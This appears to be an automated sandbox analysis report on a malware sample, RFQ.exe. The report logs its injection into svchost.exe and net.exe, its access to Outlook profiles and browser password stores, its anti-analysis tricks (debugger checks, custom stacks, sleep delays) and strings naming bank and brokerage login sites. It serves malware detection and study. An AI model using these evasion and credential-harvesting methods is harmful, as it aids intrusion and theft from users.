                Source: C:\Windows\SysWOW64\net.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: RFQ.exeStatic file information: File size 1217024 > 1048576
                Source: RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: RFQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: net.pdbUGP source: svchost.exe, 00000002.00000003.2259882847.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2259828294.000000000321A000.00000004.00000020.00020000.00000000.sdmp, enUILRNjDql.exe, 00000003.00000003.2664550517.0000000000D3B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: enUILRNjDql.exe, 00000003.00000000.2177115370.0000000000F4E000.00000002.00000001.01000000.00000004.sdmp, enUILRNjDql.exe, 00000006.00000002.4572759882.0000000000F4E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: RFQ.exe, 00000000.00000003.2123424305.0000000003930000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000000.00000003.2122654812.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2162676008.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2160931204.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2291428628.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2291428628.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.2291348058.0000000003380000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573448074.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573448074.000000000387E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.2294260392.0000000003532000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RFQ.exe, 00000000.00000003.2123424305.0000000003930000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000000.00000003.2122654812.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2162676008.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2160931204.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2291428628.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2291428628.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, net.exe, net.exe, 00000004.00000003.2291348058.0000000003380000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573448074.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573448074.000000000387E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.2294260392.0000000003532000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: net.exe, 00000004.00000002.4572237813.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573862454.0000000003D0C000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000000.2362004164.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2588395806.000000002AE6C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: net.exe, 00000004.00000002.4572237813.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573862454.0000000003D0C000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000000.2362004164.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2588395806.000000002AE6C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: net.pdb source: svchost.exe, 00000002.00000003.2259882847.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2259828294.000000000321A000.00000004.00000020.00020000.00000000.sdmp, enUILRNjDql.exe, 00000003.00000003.2664550517.0000000000D3B000.00000004.00000001.00020000.00000000.sdmp
                Source: RFQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: RFQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: RFQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: RFQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: RFQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0074E01E LoadLibraryA,GetProcAddress,0_2_0074E01E
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0074288B push 66007423h; retn 007Ah0_2_007428E1
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00756B05 push ecx; ret 0_2_00756B18
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401ACE push eax; iretd 2_2_00401B68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004061DF push FFFFFF9Bh; retf 2_2_004061E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AA1D push edi; retf 2_2_0040AA23
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401B40 push eax; iretd 2_2_00401B68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041933F push ss; ret 2_2_00419355
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00405BF7 push FFFFFFE2h; iretd 2_2_00405BFD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404BB6 push ds; iretd 2_2_00404BB8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403420 push eax; ret 2_2_00403422
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413CE3 push es; retf 2_2_00413D12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418F53 push esp; ret 2_2_00419157
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AF60 push 0000007Bh; iretd 2_2_0040AF62
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390225F pushad ; ret 2_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039027FA pushad ; ret 2_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx2_2_039309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390283D push eax; iretd 2_2_03902858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03901368 push eax; iretd 2_2_03901369
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_036E225F pushad ; ret 4_2_036E27F9
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_036E27FA pushad ; ret 4_2_036E27F9
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037109AD push ecx; mov dword ptr [esp], ecx4_2_037109B6
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_036E283D push eax; iretd 4_2_036E2858
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02EE27D4 push FFFFFFE2h; iretd 4_2_02EE27DA
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02EF08C0 push es; retf 4_2_02EF08EF
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F00E6A push esp; retf 4_2_02F00E6B
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02EE2DBC push FFFFFF9Bh; retf 4_2_02EE2DBE
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02EE1793 push ds; iretd 4_2_02EE1795
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02EE75FA push edi; retf 4_2_02EE7600
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02EE7B3D push 0000007Bh; iretd 4_2_02EE7B3F
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02EF5B30 push esp; ret 4_2_02EF5D34
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02EFB83A push esp; iretd 4_2_02EFB85B
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00798111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00798111
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0074EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0074EB42
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0075123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0075123A
                Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\RFQ.exeAPI/Special instruction interceptor: Address: 1066EE4
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\net.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418F53 rdtsc 2_2_00418F53
                Source: C:\Windows\SysWOW64\net.exeWindow / User API: threadDelayed 9842Jump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeEvaded block: after key decisiongraph_0-95027
                Source: C:\Users\user\Desktop\RFQ.exeEvaded block: after key decisiongraph_0-95870
                Source: C:\Users\user\Desktop\RFQ.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-95442
                Source: C:\Users\user\Desktop\RFQ.exeAPI coverage: 4.3 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\net.exeAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\net.exe TID: 940Thread sleep count: 131 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 940Thread sleep time: -262000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 940Thread sleep count: 9842 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\net.exe TID: 940Thread sleep time: -19684000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe TID: 6516Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\net.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\net.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00776CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00776CA9
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_007760DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_007760DD
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_007763F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_007763F9
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0077EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0077EB60
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0077F56F FindFirstFileW,FindClose,0_2_0077F56F
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0077F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0077F5FA
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00781B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00781B2F
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00781C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00781C8A
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00781F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00781F94
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02EFC820 FindFirstFileW,FindNextFileW,FindClose,4_2_02EFC820
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0074DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0074DDC0
                Source: enUILRNjDql.exe, 00000006.00000002.4572265806.000000000098F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
                Source: F14431U2a.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: F14431U2a.4.drBinary or memory string: discord.comVMware20,11696428655f
                Source: F14431U2a.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: F14431U2a.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: F14431U2a.4.drBinary or memory string: global block list test formVMware20,11696428655
                Source: F14431U2a.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: net.exe, 00000004.00000002.4575572230.00000000081FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tVMware20,11696428655
                Source: F14431U2a.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: F14431U2a.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: F14431U2a.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: net.exe, 00000004.00000002.4572237813.00000000030C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
                Source: F14431U2a.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: F14431U2a.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: F14431U2a.4.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: F14431U2a.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: F14431U2a.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: F14431U2a.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: firefox.exe, 00000008.00000002.2589774955.000001912AECC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: F14431U2a.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: F14431U2a.4.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: F14431U2a.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: F14431U2a.4.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: F14431U2a.4.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: net.exe, 00000004.00000002.4575572230.00000000081FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,116
                Source: F14431U2a.4.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: F14431U2a.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: F14431U2a.4.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: F14431U2a.4.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: F14431U2a.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: F14431U2a.4.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: F14431U2a.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: F14431U2a.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: F14431U2a.4.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: F14431U2a.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: F14431U2a.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\RFQ.exeAPI call chain: ExitProcess graph end nodegraph_0-94811
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418F53 rdtsc 2_2_00418F53
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417B93 LdrLoadDll,2_2_00417B93
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00786AAF BlockInput,0_2_00786AAF
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00733D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00733D19
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00763920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00763920
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0074E01E LoadLibraryA,GetProcAddress,0_2_0074E01E
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_01067150 mov eax, dword ptr fs:[00000030h]0_2_01067150
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_010671B0 mov eax, dword ptr fs:[00000030h]0_2_010671B0
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_01065AF0 mov eax, dword ptr fs:[00000030h]0_2_01065AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h]2_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h]2_2_039EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h]2_2_039B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039663FF mov eax, dword ptr fs:[00000030h]2_2_039663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h]2_2_0392C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov ecx, dword ptr fs:[00000030h]2_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
